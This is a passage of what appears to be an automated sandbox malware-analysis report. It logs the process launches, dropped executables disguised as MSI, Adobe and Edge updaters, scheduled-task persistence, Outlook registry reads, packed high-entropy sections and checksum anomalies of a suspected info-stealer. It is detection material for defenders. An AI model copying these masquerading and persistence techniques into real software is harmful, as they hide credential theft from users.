                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dec1c63-b17a-4876-842e-08a38d7ca489} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 15443b69710 socket
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe"
                          Source: unknownProcess created: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                          Source: unknownProcess created: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3352 -childID 1 -isForBrowser -prefsHandle 3476 -prefMapHandle 3456 -prefsLen 21837 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03d6e9a6-1e50-44a7-bf2d-b228302d3bed} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154542c5bd0 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 22027 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15219fb-e510-488d-91c4-9069f57fa56f} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 1544ff41d90 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 3 -isForBrowser -prefsHandle 2584 -prefMapHandle 4128 -prefsLen 22068 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25243739-fa95-4db8-bf39-e38de4f4d55a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154576c6a10 tab
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2160,i,16389860597425483203,2440417180069271130,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2044,i,14961278424366734041,2160420270144941880,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=2488,i,12328680280612180646,18333747278986842312,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dec1c63-b17a-4876-842e-08a38d7ca489} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 15443b69710 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3352 -childID 1 -isForBrowser -prefsHandle 3476 -prefMapHandle 3456 -prefsLen 21837 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03d6e9a6-1e50-44a7-bf2d-b228302d3bed} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154542c5bd0 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 22027 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15219fb-e510-488d-91c4-9069f57fa56f} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 1544ff41d90 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 3 -isForBrowser -prefsHandle 2584 -prefMapHandle 4128 -prefsLen 22068 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25243739-fa95-4db8-bf39-e38de4f4d55a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154576c6a10 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32
                          Source: EdgeMS131.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS131\EdgeMS131.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                          Source: I2jCDr35mu.exeStatic file information: File size 2328576 > 1048576
                          Source: I2jCDr35mu.exeStatic PE information: Raw size of awogigmw is bigger than: 0x100000 < 0x1a4400

                          Data Obfuscation

                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeUnpacked PE file: 0.2.I2jCDr35mu.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 6.2.MPGPH131.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 7.2.MPGPH131.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 8.2.RageMP131.exe.350000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 15.2.RageMP131.exe.350000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeUnpacked PE file: 47.2.idPXKSo93Tb9SEEu9e8w.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW;
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeUnpacked PE file: 48.2.MSIUpdaterV131.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW;
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeUnpacked PE file: 51.2.MSIUpdaterV131.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW;
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: ladas[1].exe.7.drStatic PE information: real checksum: 0x24b17d should be: 0x24abb4
                          Source: amert[1].exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: plaza[1].exe.7.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: real checksum: 0x24b17d should be: 0x24abb4
                          Source: RageMP131.exe.0.drStatic PE information: real checksum: 0x2398a3 should be: 0x242b44
                          Source: explorgu.exe.47.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: real checksum: 0x24b17d should be: 0xbaabc
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: plaza[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: EdgeMS131.exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: amert[1].exe.7.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: I2jCDr35mu.exeStatic PE information: real checksum: 0x2398a3 should be: 0x242b44
                          Source: MPGPH131.exe.0.drStatic PE information: real checksum: 0x2398a3 should be: 0x242b44
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: real checksum: 0x24b17d should be: 0x24abb4
                          Source: ladas[1].exe.0.drStatic PE information: real checksum: 0x24b17d should be: 0xbaabc
                          Source: I2jCDr35mu.exeStatic PE information: section name:
                          Source: I2jCDr35mu.exeStatic PE information: section name: .idata
                          Source: I2jCDr35mu.exeStatic PE information: section name:
                          Source: I2jCDr35mu.exeStatic PE information: section name: awogigmw
                          Source: I2jCDr35mu.exeStatic PE information: section name: nkfwixkm
                          Source: I2jCDr35mu.exeStatic PE information: section name: .taggant
                          Source: RageMP131.exe.0.drStatic PE information: section name:
                          Source: RageMP131.exe.0.drStatic PE information: section name: .idata
                          Source: RageMP131.exe.0.drStatic PE information: section name:
                          Source: RageMP131.exe.0.drStatic PE information: section name: awogigmw
                          Source: RageMP131.exe.0.drStatic PE information: section name: nkfwixkm
                          Source: RageMP131.exe.0.drStatic PE information: section name: .taggant
                          Source: MPGPH131.exe.0.drStatic PE information: section name:
                          Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
                          Source: MPGPH131.exe.0.drStatic PE information: section name:
                          Source: MPGPH131.exe.0.drStatic PE information: section name: awogigmw
                          Source: MPGPH131.exe.0.drStatic PE information: section name: nkfwixkm
                          Source: MPGPH131.exe.0.drStatic PE information: section name: .taggant
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name: .idata
                          Source: ladas[1].exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name: gakjennq
                          Source: ladas[1].exe.0.drStatic PE information: section name: brsozmps
                          Source: ladas[1].exe.0.drStatic PE information: section name: .taggant
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name:
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: .idata
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name:
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: gakjennq
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: brsozmps
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: .taggant
                          Source: amert[1].exe.0.drStatic PE information: section name:
                          Source: amert[1].exe.0.drStatic PE information: section name: .idata
                          Source: amert[1].exe.0.drStatic PE information: section name:
                          Source: amert[1].exe.0.drStatic PE information: section name: tfywulqz
                          Source: amert[1].exe.0.drStatic PE information: section name: prpgnkkw
                          Source: amert[1].exe.0.drStatic PE information: section name: .taggant
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name:
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: .idata
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name:
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: tfywulqz
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: prpgnkkw
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: .taggant
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: .idata
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: tfywulqz
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: prpgnkkw
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: .taggant
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: .idata
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: tfywulqz
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: prpgnkkw
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: .taggant
                          Source: EdgeMS131.exe.0.drStatic PE information: section name:
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: .idata
                          Source: EdgeMS131.exe.0.drStatic PE information: section name:
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: tfywulqz
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: prpgnkkw
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: .taggant
                          Source: niks[1].exe.0.drStatic PE information: section name:
                          Source: niks[1].exe.0.drStatic PE information: section name: .idata
                          Source: niks[1].exe.0.drStatic PE information: section name:
                          Source: niks[1].exe.0.drStatic PE information: section name: odmizeae
                          Source: niks[1].exe.0.drStatic PE information: section name: wjrksujl
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name:
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: .idata
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name:
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: odmizeae
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: wjrksujl
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name:
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: .idata
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name:
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: odmizeae
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: wjrksujl
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: .idata
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: gakjennq
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: brsozmps
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: .taggant
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name:
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: .idata
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name:
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: tfywulqz
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: prpgnkkw
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: .taggant
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name: .idata
                          Source: ladas[1].exe.7.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name: gakjennq
                          Source: ladas[1].exe.7.drStatic PE information: section name: brsozmps
                          Source: ladas[1].exe.7.drStatic PE information: section name: .taggant
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name:
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: .idata
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name:
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: gakjennq
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: brsozmps
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: .taggant
                          Source: amert[1].exe.7.drStatic PE information: section name:
                          Source: amert[1].exe.7.drStatic PE information: section name: .idata
                          Source: amert[1].exe.7.drStatic PE information: section name:
                          Source: amert[1].exe.7.drStatic PE information: section name: tfywulqz
                          Source: amert[1].exe.7.drStatic PE information: section name: prpgnkkw
                          Source: amert[1].exe.7.drStatic PE information: section name: .taggant
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name:
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: .idata
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name:
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: tfywulqz
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: prpgnkkw
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: .taggant
                          Source: niks[1].exe.7.drStatic PE information: section name:
                          Source: niks[1].exe.7.drStatic PE information: section name: .idata
                          Source: niks[1].exe.7.drStatic PE information: section name:
                          Source: niks[1].exe.7.drStatic PE information: section name: odmizeae
                          Source: niks[1].exe.7.drStatic PE information: section name: wjrksujl
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name:
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: .idata
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name:
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: odmizeae
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: wjrksujl
                          Source: gmpopenh264.dll.tmp.36.drStatic PE information: section name: .rodata
                          Source: explorgu.exe.47.drStatic PE information: section name:
                          Source: explorgu.exe.47.drStatic PE information: section name: .idata
                          Source: explorgu.exe.47.drStatic PE information: section name:
                          Source: explorgu.exe.47.drStatic PE information: section name: tfywulqz
                          Source: explorgu.exe.47.drStatic PE information: section name: prpgnkkw
                          Source: explorgu.exe.47.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0010D638 push ecx; ret 0_2_0010D64B
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00ACD638 push ecx; ret 6_2_00ACD64B
                          Source: I2jCDr35mu.exeStatic PE information: section name: entropy: 7.98730344696013
                          Source: I2jCDr35mu.exeStatic PE information: section name: awogigmw entropy: 7.953507397861078
                          Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.98730344696013
                          Source: RageMP131.exe.0.drStatic PE information: section name: awogigmw entropy: 7.953507397861078
                          Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.98730344696013
                          Source: MPGPH131.exe.0.drStatic PE information: section name: awogigmw entropy: 7.953507397861078
                          Source: plaza[1].exe.0.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: plaza[1].exe.0.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: plaza[1].exe.0.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: plaza[1].exe.0.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: ladas[1].exe.0.drStatic PE information: section name: entropy: 7.9816083368851425
                          Source: ladas[1].exe.0.drStatic PE information: section name: gakjennq entropy: 7.937614618758915
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: entropy: 7.9816083368851425
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: gakjennq entropy: 7.952472916491743
                          Source: amert[1].exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: amert[1].exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: niks[1].exe.0.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: niks[1].exe.0.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: entropy: 7.9816083368851425
